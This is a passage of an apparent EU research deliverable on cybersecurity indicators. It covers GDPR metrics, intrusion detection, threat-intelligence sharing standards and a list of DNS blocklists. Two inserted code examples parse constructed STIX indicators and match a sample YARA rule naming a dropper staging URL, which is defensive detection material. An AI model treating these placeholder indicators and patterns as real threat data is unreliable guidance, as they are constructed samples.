Nomenclature: The General Data Protection Regulation (GDPR) is a legal framework that sets guidelines for the collection and processing of personal information of individuals within the European Union (EU). ... GDPR came into effect across the EU on May 25, 2018.

Examples: GDPR, The Checklist for Compliance:
• Achieve Customer Consent.
• Hire A Data Protection Officer (DPO).
• Perform A Data Protection Impact Assessment (DPIA).
• Sound the Alarm on Data Breaches.
• Respect the Right to Be Forgotten.

Usage: Cisco's Study validates the link between good privacy practice and business benefits, as respondents report shorter sales delays as well as fewer and less costly data breaches. The length of sales delays from customer privacy concerns was reduced by 50 percent. GDPR-ready organizations see the lowest risk of data breach.

Metrics: 3,200 global security and privacy professionals in 18 countries across industries responded to a survey159 about their organisations' privacy practices, to reveal:
• 87% of companies are experiencing delays in their sales cycle due to customers' or prospects' privacy concerns, up from 66% last year, due to the greater awareness created by GDPR and data breaches in the news.
• Sales delays varied from 2.2 to 5.5 weeks in Europe, with Italy and Russia at the lower end of the range, and Spain at the higher. Delays can result in sales being lost.
• Awareness of GDPR-readiness varied from 42% to 75%, with Spain, Italy, the UK and France at the top of the range, and China, Japan and Australia at the other end.
• Only 37% of GDPR-ready companies experienced a data breach costing more than $500,000, compared with 64% of the least GDPR-ready companies.

158 Evaluating the Effectiveness of Security Metrics for Dynamic Networks - 09 2016 - https://ieeexplore.ieee.org/document/8029451/

12.12 Intrusion detection system (IDS)

Nomenclature: An intrusion detection system (IDS) monitors network traffic for suspicious activity and alerts the system or network administrator. There are also network based (NIDS) and host based (HIDS) intrusion detection systems.

Examples: Built-in host intrusion detection (HIDS), network intrusion detection (NIDS), as well as cloud intrusion detection for public cloud environments including AWS and Microsoft Azure. These should detect threats as they emerge in critical cloud and on-premises infrastructure.

Usage: Leverage intrusion detection for any environment with built-in cloud IDS, network IDS, and host-based IDS (including File Integrity Monitoring (FIM)). Use the Kill Chain Taxonomy to quickly assess threat intent and strategy. Make informed decisions with contextual data about attacks, including a description of the threat, its method and strategy, and recommendations on a response. Use automatic notifications so you can be informed of key threats as they happen. Work more efficiently with powerful analytics that uncover threat and vulnerability details, all in one console160.

Metrics: With the advances in information technology (IT), criminals are using cyberspace to commit numerous cybercrimes. Cyber infrastructures are highly vulnerable to intrusions and other threats. Physical devices and human intervention are not sufficient for monitoring and protection of these infrastructures; hence, there is a need for more sophisticated cyber defence systems that need to be flexible, adaptable and robust, and able to detect a wide variety of threats and make intelligent real-time decisions. Numerous bio-inspired computing methods of Artificial Intelligence have been increasingly playing an important role in cybercrime detection and prevention161.

159 2019 Data Privacy Benchmark Study – CISCO - https://newsroom.cisco.com/press-release-content?type=webcontent&articleId=1963564

12.12.1 Intrusion prevention system

An Intrusion Prevention System (IPS) is a network security/threat prevention technology that examines network traffic flows to detect and prevent vulnerability exploits. Vulnerability exploits usually come in the form of malicious inputs to a target application or service that attackers use to interrupt and gain control of an application or machine. Following a successful exploit, the attacker can disable the target application (resulting in a denial-of-service state) or can potentially gain access to all the rights and permissions available to the compromised application.

160 Accelerate Threat Detection with Intrusion Detection Systems - https://www.alienvault.com/solutions/intrusion-detection-system
161 Applications of Artificial Intelligence Techniques to Combating Cyber Crimes - 01 2015 - https://arxiv.org/ftp/arxiv/papers/1502/1502.03552.pdf

13 Interoperable ICT Solutions – Open Source

Interoperable ICT solutions are important in the role of Cyber Threat Intelligence sharing. As outlined above, indicators are an important component of cyber intelligence, but there are many others that are needed to provide a comprehensive cyber security solution. Sharing of information can enhance that ability. It is also important that data is actionable. A lack of standardisation in technical specifications and languages can hinder these processes.

The EU commission has recognised the importance of voluntary standardisation in product or services markets, which encourages compatibility and interoperability between products and services, fosters technological development and supports innovation. The European multi-stakeholder platform on ICT standardisation evaluated and approved the identification of the following technical specifications for referencing in public procurement162: SPF (Sender Policy Framework for Authorizing Use of Domains in Email), STARTTLS-SMTP (SMTP Service Extension for Secure SMTP over Transport Layer Security) and DANE-SMTP (SMTP Security via Opportunistic DNS-Based Authentication of Named Entities Transport Layer Security), developed by the Internet Engineering Task Force (IETF); Structured Threat Information Expression (STIX 1.2) and Trusted Automated Exchange of Indicator Information (TAXII 1.1), developed by the Organization for the Advancement of Structured Information Standards (OASIS).

The commission's recognition of ‘STIX 1.2’, a language for describing cyber threat information, and the ‘TAXII v1.1’ technical specification, both developed by OASIS, is an important advance towards standardisation and interoperability in threat intelligence sharing, as well as in the procurement of hardware, software and information technology services.

‘STIX 1.2’ is a language for describing cyber threat information in a standardised and structured manner. It covers the major topics in cyber threat data, facilitating the analysis and exchange of information about attacks. It characterises an extensive set of cyber threat information, including indicators of adversary activity such as IP addresses and file hashes, and contextual information regarding threats such as adversary Tactics, Techniques and Procedures (‘TTPs’), exploitation targets, Campaigns and Courses of Action (‘COA’). Together this information completely characterises the cyber adversary's motivations, capabilities, and activities, and thus helps in defending against attacks.

The ‘TAXII v1.1’ technical specification standardises the trusted, automated exchange of cyber threat information. TAXII defines services and message exchanges for sharing actionable cyber threat information across organisation, product, or service boundaries, in view of the detection, prevention, and mitigation of cyber threats. TAXII empowers organisations to achieve improved situational awareness about emerging threats, and it enables organisations to easily share information with partners while leveraging existing relationships and systems.

The value of cyber threat intelligence within a comprehensive CTI ecosystem is illustrated in Figure 13.1 below. Interoperability through standardisation of processes is essential in the building of effective collaborative frameworks. Examples of open source platforms built with collaborative capabilities are given in this section.

162 Commission Implementing Decision (EU) 2017/2288 of 11 December 2017 on the identification of ICT Technical Specifications for referencing in public procurement - http://eur-lex.europa.eu/legal-content/EN/TXT/?uri=CELEX:32017D2288

Figure 13.1: ENISA CTI Modules163

13.1 OASIS - STIX, TAXII, CYBOX

STIX 1.2, developed by OASIS, is a language for describing cyber threat information in a standardised and structured manner. It covers the major topics in cyber threat data, facilitating the analysis and exchange of information about attacks. It characterises an extensive set of cyber threat information, including indicators of adversary activity such as IP addresses and file hashes, and contextual information regarding threats such as adversary Tactics, Techniques and Procedures (TTPs), exploitation targets, Campaigns and Courses of Action (COA). Together this information completely characterises the cyber adversary's motivations, capabilities, and activities, and thus helps in defending against attacks.

The TAXII v1.1 technical specification standardises the trusted, automated exchange of cyber threat information. TAXII defines services and message exchanges for sharing actionable cyber threat information across organisation, product, or service boundaries, in view of the detection, prevention, and mitigation of cyber threats. TAXII empowers organisations to achieve improved situational awareness about emerging threats, and it enables organisations to easily share information with partners while leveraging existing relationships and systems.

13.2 MISP

The MISP threat sharing platform, which is EU developed and based, is free and open source software that helps the sharing of threat intelligence, including cyber security indicators. It is a threat intelligence platform for gathering, sharing, storing and correlating Indicators of Compromise of targeted attacks, threat intelligence, financial fraud information, vulnerability information or even counter-terrorism information. It provides for storage of a user's IOCs (Indicators of Compromise) in a structured manner, so that users benefit from correlation, automated exports for IDS or SIEM in STIX or OpenIOC format, and synchronisation to other MISPs. This leverages the IOCs' value with reduced effort and in an automated fashion.
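The indicator structure described in 13.1, and the STIX export that 13.2 mentions for MISP, can be seen in a small worked example. The code below is an added example, not code from the report, OASIS or the MISP project: it constructs a minimal STIX 1.2 package with one IP-address indicator and one file-hash indicator, extracts them into flat records, and sanity-checks each record before it would be handed to an IDS or SIEM. The namespace URIs are assumed from the STIX 1.x / CybOX 2.x schemas; all identifiers, the address and the hash are constructed placeholders.

```python
import ipaddress
import xml.etree.ElementTree as ET

# STIX 1.x / CybOX 2.x namespace URIs (assumed from the published schemas).
NS = {
    "stix": "http://stix.mitre.org/stix-1",
    "indicator": "http://stix.mitre.org/Indicator-2",
    "cybox": "http://cybox.mitre.org/cybox-2",
    "cyboxCommon": "http://cybox.mitre.org/common-2",
    "AddressObj": "http://cybox.mitre.org/objects#AddressObject-2",
    "FileObj": "http://cybox.mitre.org/objects#FileObject-2",
    "xsi": "http://www.w3.org/2001/XMLSchema-instance",
}
XSI_TYPE = "{%s}type" % NS["xsi"]
HASH_LENGTHS = {"md5": 32, "sha1": 40, "sha256": 64}

# Constructed sample package: the ids, the address and the hash are placeholders.
SAMPLE_PACKAGE = """<stix:STIX_Package version="1.2" id="example:Package-1"
    xmlns:stix="http://stix.mitre.org/stix-1"
    xmlns:indicator="http://stix.mitre.org/Indicator-2"
    xmlns:cybox="http://cybox.mitre.org/cybox-2"
    xmlns:cyboxCommon="http://cybox.mitre.org/common-2"
    xmlns:AddressObj="http://cybox.mitre.org/objects#AddressObject-2"
    xmlns:FileObj="http://cybox.mitre.org/objects#FileObject-2"
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <stix:Indicators>
    <stix:Indicator id="example:indicator-1" xsi:type="indicator:IndicatorType">
      <indicator:Title>Constructed C2 address watchlist entry</indicator:Title>
      <indicator:Observable id="example:Observable-1">
        <cybox:Object id="example:Object-1">
          <cybox:Properties xsi:type="AddressObj:AddressObjectType" category="ipv4-addr">
            <AddressObj:Address_Value condition="Equals">192.0.2.10</AddressObj:Address_Value>
          </cybox:Properties>
        </cybox:Object>
      </indicator:Observable>
    </stix:Indicator>
    <stix:Indicator id="example:indicator-2" xsi:type="indicator:IndicatorType">
      <indicator:Title>Constructed dropper file hash</indicator:Title>
      <indicator:Observable id="example:Observable-2">
        <cybox:Object id="example:Object-2">
          <cybox:Properties xsi:type="FileObj:FileObjectType">
            <FileObj:Hashes>
              <cyboxCommon:Hash>
                <cyboxCommon:Type>SHA256</cyboxCommon:Type>
                <cyboxCommon:Simple_Hash_Value>0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef</cyboxCommon:Simple_Hash_Value>
              </cyboxCommon:Hash>
            </FileObj:Hashes>
          </cybox:Properties>
        </cybox:Object>
      </indicator:Observable>
    </stix:Indicator>
  </stix:Indicators>
</stix:STIX_Package>
"""


def extract_indicators(xml_text: str) -> list:
    """Walk Indicators -> Observable -> Object -> Properties and flatten each IoC."""
    records = []
    for ind in ET.fromstring(xml_text).iterfind("stix:Indicators/stix:Indicator", NS):
        title = ind.findtext("indicator:Title", default="", namespaces=NS)
        for props in ind.iterfind(".//cybox:Properties", NS):
            kind = props.get(XSI_TYPE, "")
            if kind.endswith("AddressObjectType"):
                records.append({"title": title, "type": props.get("category", "address"),
                                "value": props.findtext("AddressObj:Address_Value", namespaces=NS)})
            elif kind.endswith("FileObjectType"):
                for h in props.iterfind("FileObj:Hashes/cyboxCommon:Hash", NS):
                    records.append({"title": title,
                                    "type": h.findtext("cyboxCommon:Type", namespaces=NS).lower(),
                                    "value": h.findtext("cyboxCommon:Simple_Hash_Value", namespaces=NS)})
    return records


def is_actionable(record: dict) -> bool:
    """Reject malformed indicators so a bad feed entry cannot reach an IDS rule set."""
    value, kind = record.get("value") or "", record.get("type", "")
    if kind in ("ipv4-addr", "ipv6-addr"):
        try:
            return ipaddress.ip_address(value).version == (4 if kind == "ipv4-addr" else 6)
        except ValueError:
            return False
    if kind in HASH_LENGTHS:
        return len(value) == HASH_LENGTHS[kind] and all(c in "0123456789abcdef" for c in value.lower())
    return False
```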

163 ENISA CTI Modules - https://etl.enisa.europa.eu/#/

13.3 YARA

YARA is the name of a rule-based tool developed to identify and classify patterns of particular strains or entire families of malware. It was originally developed by Victor Alvarez of VirusTotal164. It is a multi-platform program running on Windows, Linux and Mac OS X. A YARA rule is created to describe a malware family based on textual or binary patterns. The rules consist of sets of strings and a boolean expression which determines the rule's logic. The language used has traits of Perl compatible regular expressions.
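To show what "sets of strings and a boolean expression" means in practice, here is an added example that is not code from the report or from the YARA project: a constructed rule written in YARA syntax and a small Python matcher that supports a subset of YARA (text, hex and regex strings; and/or/not; "$id at N"), run against constructed sample buffers. Real YARA adds much more (string modifiers, match counts, module functions); the sample rule, buffers and helper names here are all hypothetical.

```python
import re

# Constructed sample rule in YARA syntax (not a rule from the report).
SAMPLE_RULE = r'''
rule Demo_Dropper : trojan
{
    meta:
        description = "constructed example: MZ header plus a staging URL or temp file"
    strings:
        $mz  = { 4D 5A }
        $url = "http://example.invalid/payload"
        $tmp = /build[0-9]{4}\.tmp/
    condition:
        $mz at 0 and ($url or $tmp)
}
'''

# Constructed sample buffers, not real files.
SAMPLE_HIT = b"MZ\x90\x00" + b"\x00" * 28 + b"... http://example.invalid/payload ..."
SAMPLE_HIT_REGEX = b"MZ" + b"\x00" * 40 + b"dropped build2019.tmp"
SAMPLE_MISS = b"\x7fELF" + b" http://example.invalid/payload"


def _hex_to_regex(body: str) -> bytes:
    """'4D 5A ?? 00' -> regex bytes; '??' is YARA's single-byte wildcard."""
    return b"".join(b"." if tok == "??" else re.escape(bytes.fromhex(tok))
                    for tok in body.split())


def parse_rule(text: str) -> dict:
    """Return {'name', 'patterns' (id -> compiled bytes regex), 'condition'}."""
    rule = {"name": re.search(r"^\s*rule\s+(\w+)", text, re.M).group(1),
            "patterns": {}, "condition": ""}
    section = None
    for line in (raw.strip() for raw in text.splitlines()):
        if line in ("meta:", "strings:", "condition:"):
            section = line[:-1]
        elif section == "strings" and line.startswith("$"):
            ident, _, value = line.partition("=")
            ident, value = ident.strip()[1:], value.strip()
            if value.startswith("{"):                    # hex string
                pat = _hex_to_regex(value.strip("{} "))
            elif value.startswith("/"):                  # regular expression
                pat = value[1:value.rfind("/")].encode()
            else:                                        # quoted text string
                pat = re.escape(value[1:-1].encode())
            rule["patterns"][ident] = re.compile(pat, re.S)
        elif section == "condition" and line and line != "}":
            rule["condition"] += " " + line
    rule["condition"] = rule["condition"].strip()
    return rule


def find_offsets(rule: dict, data: bytes) -> dict:
    """Offsets of every (non-overlapping) match, keyed by string id."""
    return {ident: [m.start() for m in pat.finditer(data)]
            for ident, pat in rule["patterns"].items()}


class _Cond:
    """Recursive descent: expr = term ('or' term)*; term = factor ('and' factor)*."""
    _TOKEN = re.compile(r"\$\w+|\(|\)|\w+")

    def __init__(self, condition: str, offsets: dict):
        self.toks, self.i, self.off = self._TOKEN.findall(condition), 0, offsets

    def _peek(self):
        return self.toks[self.i] if self.i < len(self.toks) else None

    def _take(self):
        self.i += 1
        return self.toks[self.i - 1] if self.i <= len(self.toks) else None

    def expr(self) -> bool:
        value = self.term()
        while self._peek() == "or":
            self._take()
            value = self.term() or value
        return value

    def term(self) -> bool:
        value = self.factor()
        while self._peek() == "and":
            self._take()
            value = self.factor() and value
        return value

    def factor(self) -> bool:
        tok = self._take()
        if tok == "not":
            return not self.factor()
        if tok == "(":
            value = self.expr()
            if self._take() != ")":
                raise ValueError("unbalanced parenthesis in condition")
            return value
        if tok and tok.startswith("$"):
            hits = self.off[tok[1:]]
            if self._peek() == "at":               # '$id at N': match at a fixed offset
                self._take()
                return int(self._take()) in hits
            return bool(hits)
        raise ValueError(f"unexpected token {tok!r}")


def match(rule: dict, data: bytes) -> bool:
    return _Cond(rule["condition"], find_offsets(rule, data)).expr()
```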

164 YARA documentation - https://yara.readthedocs.io/en/v3.8.1/index.html

14 Conclusions and Recommendations

14.1 Conclusions

This deliverable combines the research of D2.1 and D2.2 to arrive at a comprehensive body of work on the state of the art in active sources of cyber-threat activity, including: blacklists, cyber-attack measurements, malware listing, infected websites and phishing activity. A SAINT taxonomy was developed using indicators from each of these areas and defined using four elements for simplicity and reference, i.e. Nomenclature, Examples, Usage, and Metrics. A separate group of indicators, which apply specifically to Econometrics, is arranged across two key elements: Nomenclature, and Metrics & Econometric analysis. The result is presented as a core SAINT objective.

The key conclusions from the research and analysis performed for the deliverable:

(1) The need for comprehensive and consistent measurement methodologies: Attempts have been made over recent years to derive estimates of the metrics and costs associated with cybercrime. Across a wide range and spectrum of these studies there are major inconsistencies in the approach to metric analysis and in the way results are presented. Studies often adopt diverse types of measurements during the course of an analysis, for example annual costs, costs per attack, costs per sector, making it a challenge for comparable analysis, such as benchmarking, to be used in any meaningful way. An example of the need for consistent metrics and costs associated with cybercrime is shown within the UK government publication "Understanding the costs of cybercrime - A report of key findings from the Costs of Cyber Crime Working Group", Research Report 96, Home Office Science Advisory Council UK165. It was found that the poor quality of data gathered during the surveys was a major limitation and led to major inconsistencies in the estimates and analyses.

(2) The need for good quality data with comparative and econometric value: Reports and surveys have intrinsic importance within comparative and econometric processes and analyses. They provide evidence for the benefit of decision makers and stakeholders, for example. In D2.3 “Initial Report on the Comparative Analysis of Cybercrime Victims” (Section 4), we provided a model of the type of data that provides such value. Here, ‘Time spent / lost per victim of cybercrime’ was included within the measurements used. This enabled results to be calculated specifically for EU purposes, as well as highlighting ‘time and further costs of cybercrime victims’ as important factors in this type of analysis. There are numerous surveys and reports on cybercrime and cybersecurity that seek to gain citizens' or stakeholders' opinions on cybercrime and cybersecurity. An EU example of this is “Europeans’ attitudes towards cyber security”, June 2017 Report, Special Eurobarometer 464a, by Eurostat, the widest survey carried out in the 28 Member States of the European Union, between 13 and 26 June 2017. Some 28,093 EU citizens from different social and demographic categories were interviewed at home and in their native language. These types of studies serve to demonstrate that there can be a difference between the way in which respondents would prefer to act (qualitative), as opposed to what actually happens (quantifiable). Inconsistencies in human behaviour in contexts of uncertainty (the uncertainty of cyber attacks/incidents

165 Understanding the costs of cybercrime - 01 2018 - https://www.techuk.org/images/understanding-costs-of-cyber-crime-horr96.pdf

occurrence) is an important consideration and a topic within the remit of behavioural economics. For example, (a) in one area the EU report shows from respondents: “If they experienced or were the victim of cybercrime, most respondents say they would contact the police, especially if the crime was identity theft (85%), online banking fraud (76%), or if they accidentally encountered child abuse content online (76%)”166. (b) This must be compared with the actual numbers reporting cybercrime. For example, the Safety Monitor published recently by Statistics Netherlands (CBS) shows that “Three quarters of cybercrime cases are not reported, only (27%) of these crimes were reported to the police or other institutions”167. Obviously, any decision maker or stakeholder could draw very different conclusions from each of these reports on cybercrime, i.e. from (a) it is working well and the majority would report, from (b) what can we do, or how do we encourage more to report.

(3) The need for metrics and measures within standard cyber security taxonomies: The research carried out during Task 2.1, and presented in this final deliverable on Cybersecurity Indicators & Open Source Intelligence Methodologies, has provided valuable input for the whole of the SAINT project. The representation of the SAINT taxonomy is innovative in its inclusion of current sources of measurement for each of the indicators, where these currently exist. The list is not exhaustive and not all of the metric sources are verifiable, but this has been a first attempt to bring together meaningful measurements for a vast array of known threat indicators. This research supports the view that metrics within cybersecurity are not just a nice add-on but a necessity.

Further, the SAINT indicators form a major contribution to the global view of cybercrime as depicted in SAINT's Global Security Map tool. As well, the SAINT indicators are integral to the econometric model of cybersecurity in Finland as outlined in D2.4 “Final Report on the Comparative Analysis of Cybercrime Victims” and the SAINT whitepaper ‘Traficom’ (formerly Ficora), which is a major result of the SAINT project and a showcase for the importance of metrics in this field. In the words of the management consultant and educator Peter Drucker, “If you can't measure it, you can't manage it”168. SAINT research exhibits how it is possible to achieve both through the Finnish model of cybersecurity management.

14.2 Recommendations

For this body of work, active sources of threat analysis have been surveyed, with a synopsis provided through the SAINT taxonomy. In the opinion of the authors, the addition of examples of relevant sources of metrics, where these are available, is an innovative approach to taxonomy methodologies. This research and its results have been executed according to the remit of this deliverable, and the SAINT project as a whole, but, due to the fast-paced nature of cybersecurity, it is considered to be a live document and without finite end. In consideration of this factor, there are several recommendations that the authors propose as follows:

1) This innovative taxonomy, presented as a live document, is worthy of further in-depth research and dedicated resources beyond the remit, and lifetime, of the SAINT project.

2) ‘Metrics for managing cybersecurity’ has value as an empirical research theme beyond the lifetime of the SAINT project. An avenue for this type of research could be an EU foundation in the style of “The Drucker Institute”168.

3) In line with 2) above, areas for exploration could include the determining of core principles as the

166 Europeans' attitudes towards cyber security – 06 2017 - https://ec.europa.eu/home-affairs/news/europeans%E2%80%99-attitudes-towards-cyber-security_en
167 Three-quarters of cybercrime cases not reported - 09 2017 - https://www.cbs.nl/en-gb/news/2017/39/three-quarters-of-cybercrime-cases-not-reported
168 The Drucker Institute - https://www.drucker.institute/

foundation for measurement and performance methodologies from which relevant statistics and rankings could be proposed.

4) The Finnish model for cybersecurity should be proposed as an example of the value to all stakeholders of both measurement and management.

The above themes will be proposed and presented as possible avenues for dissemination and exploration of SAINT results.


15 Annex A - Current List of all Open Source RBLs (Blacklists / Blocklists) - Alive – Feb 19

List of all Open Source RBLs blacklists / Blocklists

alive (328)

Columns: number, list name, DNS zone, and the lookup types the zone serves (ipv4, ipv6, domain; "-" means not served).

1 0spam DNSBL 0spam.fusionzero.com ipv4 - -

2 0spam DNSWL 0spamtrust.fusionzero.com ipv4 - -

3 0spam KillList 0spam-killlist.fusionzero.com ipv4 - -

4 0spam url-DBL 0spamurl.fusionzero.com - - domain

5 abuse.ch ZeuS Tracker domains uribl.zeustracker.abuse.ch - - domain

6 abuse.ch ZeuS Tracker IP ipbl.zeustracker.abuse.ch ipv4 - -

7 Abuse.net contacts.abuse.net - - domain

8 abuse.ro IP RBL rbl.abuse.ro ipv4 - -

9 abuse.ro URI RBL uribl.abuse.ro - - domain

10 abusix.org Abuse Contact DB abuse-contacts.abusix.org ipv4 - -

11 anonmails.de DNSBL spam.dnsbl.anonmails.de ipv4 - -

12 AntiCaptcha.NET IPv4 dnsbl.anticaptcha.net ipv4 - -


13 AntiCaptcha.NET IPv6 dnsbl6.anticaptcha.net - ipv6 -

14 ANTISPAM-UFRJ orvedb orvedb.aupads.org ipv4 - -

15 ANTISPAM-UFRJ rsbl rsbl.aupads.org ipv4 - -

16 Ascams.com Block block.ascams.com ipv4 - -

17 Ascams.com Superblock superblock.ascams.com ipv4 - -

18 ASPEWS Listings aspews.ext.sorbs.net ipv4 - -

19 Backscatterer.org ips.backscatterer.org ipv4 - -

20 Barracuda Reputation Block List b.barracudacentral.org ipv4 - -

21 Barracuda Reputation Block List (for SpamAssassin) bb.barracudacentral.org ipv4 - -

22 BBFH Level 1 list.bbfh.org ipv4 - -

23 BBFH Level 1 (@SORBS) l1.bbfh.ext.sorbs.net ipv4 - -

24 BBFH Level 2 (@SORBS) l2.bbfh.ext.sorbs.net ipv4 - -

25 BBFH Level 3 (@SORBS) l3.bbfh.ext.sorbs.net ipv4 - -

26 BBFH Level 4 (@SORBS) l4.bbfh.ext.sorbs.net ipv4 - -

27 BIT.nl all ascc IPv4 address space list all.ascc.dnsbl.bit.nl ipv4 - -

28 BIT.nl all ascc IPv6 address space list all.v6.ascc.dnsbl.bit.nl - ipv6 -

29 BIT.nl all IPv4 address space list all.dnsbl.bit.nl ipv4 - -


30 BIT.nl all IPv6 address space list ipv6.all.dnsbl.bit.nl - ipv6 -

31 BIT.nl own IPv4 and IPv6 address space list bitonly.dnsbl.bit.nl ipv4 ipv6 -

32 blacklist.netcore.co.in blacklist.netcore.co.in - - domain

33 BlakJak.net RBL rbl.blakjak.net ipv4 - -

34 BlockedServers NetScan RBL netscan.rbl.blockedservers.com ipv4 - -

35 BlockedServers RBL rbl.blockedservers.com ipv4 - -

36 BlockedServers Spam RBL spam.rbl.blockedservers.com ipv4 - -

37 Blog Spam Blacklist list.blogspambl.com ipv4 - -

38 Blog Spam Blocklist (empty.us) bsb.empty.us ipv4 - domain

39 Blog Spam Blocklist (spamlookup.net) bsb.spamlookup.net ipv4 - domain

40 Bondedsender query.bondedsender.org ipv4 - -

41 Bondedsender plus plus.bondedsender.org ipv4 - -

42 borderware.com DNSBL1 dnsbl1.dnsbl.borderware.com ipv4 - -

43 borderware.com DNSBL2 dnsbl2.dnsbl.borderware.com ipv4 - -

44 borderware.com DNSBL3 dnsbl3.dnsbl.borderware.com ipv4 - -


45 borderware.com DUL dul.dnsbl.borderware.com ipv4 - -

46 C&CZ's own black list blacklist.sci.kun.nl ipv4 - -

47 C&CZ's own white list whitelist.sci.kun.nl ipv4 - -

48 cantv.net dul dul.blackhole.cantv.net ipv4 - domain

49 cantv.net hog hog.blackhole.cantv.net ipv4 - domain

50 cantv.net rhsbl rhsbl.blackhole.cantv.net ipv4 - domain

51 cantv.net rot rot.blackhole.cantv.net ipv4 - domain

52 cantv.net spam spam.blackhole.cantv.net ipv4 - domain

53 CASA CBL cbl.anti-spam.org.cn ipv4 - -

54 CASA CBL+ cblplus.anti-spam.org.cn ipv4 - -

55 CASA CBL- cblless.anti-spam.org.cn ipv4 - -

56 CASA CDL cdl.anti-spam.org.cn ipv4 - -

57 CASA CML cml.anti-spam.org.cn ipv4 - -

58 CBL cbl.abuseat.org ipv4 - -

59 choon.net IPv4 DNSBL rbl.choon.net ipv4 - -

60 choon.net IPv4 DNSWL rwl.choon.net ipv4 - -

61 choon.net IPv6 DNSBL ipv6.rbl.choon.net - ipv6 -

62 choon.net IPv6 DNSWL ipv6.rwl.choon.net - ipv6 -


63 countries.nerd.dk DNSBL (zz) zz.countries.nerd.dk ipv4 - -

64 Cyberlogic DNSBL dnsbl.cyberlogic.net ipv4 - -

65 Cymru Bogon List bogons.cymru.com ipv4 - -

66 Cymru Fullbogon IPv4 List v4.fullbogons.cymru.com ipv4 - -

67 Cymru Fullbogon IPv6 List v6.fullbogons.cymru.com - ipv6 -

68 Cymru origin IPv4 asn list origin.asn.cymru.com ipv4 - -

69 Cymru origin IPv6 asn list origin6.asn.cymru.com - ipv6 -

70 Cymru peer asn list peer.asn.cymru.com ipv4 - -

71 dan.me.uk (all tor nodes) tor.dan.me.uk ipv4 - -

72 dan.me.uk (only tor exit nodes) torexit.dan.me.uk ipv4 - -

73 DNS-bl ex zone ex.dnsbl.org - - domain

74 DNS-bl in zone in.dnsbl.org - - domain

75 DNS-SERVICIOS RBL rbl.dns-servicios.com ipv4 - -

76 dnsbl.abyan.es dnsbl.abyan.es ipv4 - domain

77 dnsbl.beetjevreemd.nl dnsbl.beetjevreemd.nl ipv4 ipv6 -

78 dnsbl.calivent.com.pe dnsbl.calivent.com.pe ipv4 - -

79 dnsbl.mcu.edu.tw dnsbl.mcu.edu.tw ipv4 - -

80 dnsbl.net.ua dnsbl.net.ua ipv4 - -


81 dnsbl.othello.ch dnsbl.othello.ch - - domain

82 dnsbl.rv-soft.info dnsbl.rv-soft.info ipv4 - -

83 dnsblchile.org dnsblchile.org ipv4 - -

84 DNSRBL - DNS Real-time Blackhole List dnsrbl.org ipv4 - -

85 DNSWL.org list.dnswl.org ipv4 ipv6 -

86 DRBL caravan.ru (vote node) vote.drbl.caravan.ru ipv4 - -

87 DRBL caravan.ru (work node) work.drbl.caravan.ru ipv4 - -

88 DRBL dsbl.ru (vote node) vote.drbldf.dsbl.ru ipv4 - -

89 DRBL dsbl.ru (work node) work.drbldf.dsbl.ru ipv4 - -

90 DRBL gremlin.ru (vote node) vote.drbl.gremlin.ru ipv4 - -

91 DRBL gremlin.ru (work node) work.drbl.gremlin.ru ipv4 - -

92 DrMX bl.drmx.org ipv4 - -

93 DroneBL dnsbl.dronebl.org ipv4 ipv6 -

94 EFnet RBL rbl.efnet.org ipv4 - -

95 EFnet RBL mirror rbl.efnetrbl.org ipv4 - -

96 EFnet TOR tor.efnet.org ipv4 - -

97 emailbasura.org bl.emailbasura.org ipv4 - -

98 Fasthosts RBL rbl.fasthosts.co.uk ipv4 - -


99 fmb.la bl bl.fmb.la ipv4 - domain

100 fmb.la communicado communicado.fmb.la - - domain

101 fmb.la nsbl nsbl.fmb.la - - domain

102 fmb.la sa sa.fmb.la - - domain

103 fmb.la short short.fmb.la - - domain

104 fnrbl.fast.net fnrbl.fast.net ipv4 - -

105 forbidden.icm.edu.pl forbidden.icm.edu.pl ipv4 - -

106 Frontbridge’s 88.blocklist.zap 88.blocklist.zap ipv4 - -

107 Habeas Infringer List hil.habeas.com ipv4 - -

108 Habeas SafeList accredit.habeas.com ipv4 - -

109 Habeas SafeList (for SpamAssassin) sa-accredit.habeas.com ipv4 - -

110 Habeas User List hul.habeas.com ipv4 - -

111 Habeas User List (including Non-Verified-Optin) sohul.habeas.com ipv4 - -

112 Hostkarma hostkarma.junkemailfilter.com ipv4 - domain

113 Hostkarma no blacklist nobl.junkemailfilter.com ipv4 - domain

114 IBM DNS Blacklist dnsbl.cobion.com ipv4 - -

115 ImproWare IP based spamlist spamrbl.imp.ch ipv4 - -


116 ImproWare IP based wormlist wormrbl.imp.ch ipv4 - -

117 inps.de-DNSBL dnsbl.inps.de ipv4 - -

118 inps.de-DNSWL dnswl.inps.de ipv4 - -

119 InterServer BL rbl.interserver.net ipv4 - -

120 invaluement DNSBL ivmSIP (hidden) ipv4 -

121 invaluement DNSBL ivmSIP/24 (hidden) ipv4 - -

122 invaluement DNSBL ivmURI (hidden) - - domain

123 IPrange.net RBL rbl.iprange.net ipv4 - -

124 ISIPP Accreditation Database iadb.isipp.com ipv4 - -

125 ISIPP Accreditation Database (IADB2) iadb2.isipp.com ipv4 - -

126 ISIPP Accreditation Database (IDDB) iddb.isipp.com - - domain

127 ISIPP Accreditation Database (WADB) wadb.isipp.com ipv4 - -

128 ISPA (Internet Service Provider Austria) Whitelist whitelist.rbl.ispa.at ipv4 - -

129 JIPPG's RBL Project (mail-abuse Listings) mail-abuse.blacklist.jippg.org ipv4 - -

130 JustSpam.org dnsbl.justspam.org ipv4 - -

131 Kempt.net DNS Black List dnsbl.kempt.net ipv4 - -


132 KISA-RBL spamlist.or.kr ipv4 - -

133 KONSTANT DNSBL bl.konstant.no ipv4 - -

134 kundenserver.de admin.bl admin.bl.kundenserver.de ipv4 - -

135 kundenserver.de relays relays.bl.kundenserver.de ipv4 - -

136 kundenserver.de schizo-bl schizo-bl.kundenserver.de ipv4 - -

137 kundenserver.de spamblock spamblock.kundenserver.de ipv4 - -

138 kundenserver.de worms-bl worms-bl.kundenserver.de ipv4 - -

139 Leadmon.Net's SpamGuard Listings (LNSG) spamguard.leadmon.net ipv4 - -

140 lugh.ch DNSBL rbl.lugh.ch ipv4 - -

141 Madavi:BL dnsbl.madavi.de ipv4 - -

142 mailrelay.att.net blacklist blacklist.mailrelay.att.net ipv4 - -

143 Mailspike Blacklist bl.mailspike.net ipv4 - -

144 Mailspike Reputation rep.mailspike.net ipv4 - -

145 Mailspike Whitelist wl.mailspike.net ipv4 - -

146 Mailspike Zero-hour Data z.mailspike.net ipv4 - -

147 MAV BL bl.mav.com.br ipv4 - -

